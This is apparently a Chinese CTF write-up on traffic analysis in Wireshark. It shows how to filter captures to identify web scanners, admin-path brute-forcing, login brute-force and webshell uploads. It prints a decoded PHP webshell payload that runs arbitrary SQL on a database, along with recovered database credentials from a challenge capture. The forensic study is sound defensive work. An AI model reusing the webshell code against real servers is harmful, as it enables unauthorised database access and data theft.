2021-05-03Wireshark流量包分析

目录

WEB扫描分析

后台目录爆破分析

后台账号爆破

WEBSHELL上传

其他题目

        参考链接


WEB数据包分析的题目主要出现WEB攻击行为的分析上, 典型的WEB攻击行为有:WEB扫描、后台目录爆破、后台账号爆破、WEBSHELL上传、SQL注入等等。

WEB扫描分析

题型:

通过给出的流量包获取攻击者使用的WEB扫描工具。

解题思路:

常见的WEB扫描器有Awvs,Netsparker,Appscan,Webinspect,Rsas(绿盟极光),Nessus,WebReaver,Sqlmap等。要识别攻击者使用的是哪一种扫描器,可通过wireshark筛选扫描器特征来得知。

相关命令:http contains “扫描器特征值”。

1.awvs:acunetix

2.netsparker:netsparker

3.appscan:Appscan

4.nessus:nessus

5.sqlmap:sqlmap

常见的扫描器特征参考:常见扫描器或者自动化工具的特征(指纹)

【练习】安恒八月月赛流量分析:2021-05-03Wireshark流量包分析 2021-05-03Wireshark流量包分析

后台目录爆破分析

题型:

已知攻击者通过目录爆破的手段获取了网站的后台地址,请通过给出的流量包获取后台地址。

解题思路:

要获取流量包中记录的后台地址,可通过wireshark筛选后台url特征来得知。

相关命令:http contains “后台url特征”。

常见后台url特征:

1.admin

2.manager

3.login

4.system

 

【练习】安恒八月月赛流量分析:黑客扫描到的后台登录地址是什么?

2021-05-03Wireshark流量包分析

/admin/login.php?rec=login 

后台账号爆破

题型:

已知攻击者通过暴力破解的手段获取了网站的后台登陆账号,请通过给出的流量包获取正确的账号http.request.method=="POST"  and  http contains "关键字"。

【练习】安恒八月月赛流量分析:黑客使用了什么账号密码登录了web后台?

思路1:登陆后台99%使用的是POST方法,使用过滤器+追踪TCP流,有302重定向则登录成功。刚才使用扫描的源ip一定是黑客的ip地址,使用过滤可得

http.request.method=="POST" and ip.src==192.168.94.59 and http contains "rec=login"
2021-05-03Wireshark流量包分析

思路2:返回字段长度为75X,说定post登录成功(目前没搞懂)

2021-05-03Wireshark流量包分析

 WEBSHELL上传

题型:

已知攻击者上传了恶意webshell文件,请通过给出的流量包还原出攻击者上传的webshell内容。

解题思路:

Webshell文件上传常采用post方法请求,文件内容常见关键字eval,system,assert要。获取流量包中记录的webshell可通过wireshark筛选出POST请求和关键字.

相关命令:http.request.method=="POST"  and  http contains "关键字"

【练习】安恒八月月赛流量分析:黑客上传的webshell文件名是?内容是什么?

2021-05-03Wireshark流量包分析

Form item: "action" = "QGluaV9zZXQgKCAiZGlzcGxheV9lcnJvcnMiLCAiMCIgKTtA2021-05-03Wireshark流量包分析 这样好像并不完整,追踪2021-05-03Wireshark流量包分析 2021-05-03Wireshark流量包分析

2021-05-03Wireshark流量包分析

2021-05-03Wireshark流量包分析

其他题目

1.某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么

思路一:导出对象,搜索robots.txt

2021-05-03Wireshark流量包分析

保存,然后打开

2021-05-03Wireshark流量包分析

flag:flag:87b7cb79481f317bde90c116cf36084b

思路二:直接过滤http contains"Disallow"

2021-05-03Wireshark流量包分析

2.某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少

2021-05-03Wireshark流量包分析

2021-05-03Wireshark流量包分析 常见的方法是:

根据http contains"dbhost"找到数据库服务器地址10.3.3.101之后,追踪tcp流

2021-05-03Wireshark流量包分析2021-05-03Wireshark流量包分析

@ini_set ( "display_errors", "0" );@set_time_limit ( 0 );@set_magic_quotes_runtime ( 0 );echo ("->|");;$m = get_magic_quotes_gpc ();$conf = $m ? stripslashes ( $_POST ["z1"] ) : $_POST ["z1"];$ar = explode("choraheiheihei", $conf);$dbn = $m ? stripslashes ( $_POST ["z2"] ) : $_POST ["z2"];$sql = base64_decode ( $_POST ["z3"] );$T = @mysql_connect($ar[0],$ar[1],$ar[2]);@mysql_query ( "SET NAMES utf8" );if($dbn==""){$sql = "SHOW DATABASES";$q = @mysql_query ( $sql );$i = 0;while($rs=@mysql_fetch_row($q)){echo(trim($rs[0]).chr(9))."t|trn";}@mysql_close($T);;echo("|<-");die();}else{    @mysql_select_db ( $dbn );$q = @mysql_query ( $sql );$i = 0;while ( $col = @mysql_field_name ( $q, $i ) ) {echo ($col . "t|t");$i ++;}echo ("rn");while ( $rs = @mysql_fetch_row ( $q ) ) {for($c = 0; $c < $i; $c ++) {echo (trim ( $rs [$c] ));echo ("t|t");}echo ("rn");}@mysql_close ( $T );;echo ("|<-");die ();}

base64解码之后,如上
 

提取出以下主要文本

&z1=10.3.3.101choraheiheiheiwebchoraheiheiheie667jUPvJjXHvEUv&z2=web&z3=c2VsZWN0ICogZnJvbSBkb3Vfc2hvdw==
$ar = explode("choraheiheihei", $conf)
可知以choraheiheihei为分割符号,提取出用户名为web,密码为e667jUPvJjXHvEUv

 

3.某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash_code是什么(手上没有webtwo.pcap)

4.某公司内网网络被黑客渗透,请分析流量,黑客破解了账号ijnu@test.com得到的密码是什么

2021-05-03Wireshark流量包分析

 

  1. 某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip
2021-05-03Wireshark流量包分析

某公司内网网络被黑客渗透,请分析流量,黑客使用了什么账号登陆了mail系统(形式: username/password)(没有对应的pcap)

某公司内网网络被黑客渗透,请分析流量,黑客获得的vpn的ip是多少(没有对应的pcap)

参考链接

CTF流量分析之题型深度解析

ctf之流量分析

安恒八月月赛流量分析writeup

版权声明:玥玥 发表于 2021-05-04 17:04:15。
转载请注明:2021-05-03Wireshark流量包分析 | 女黑客导航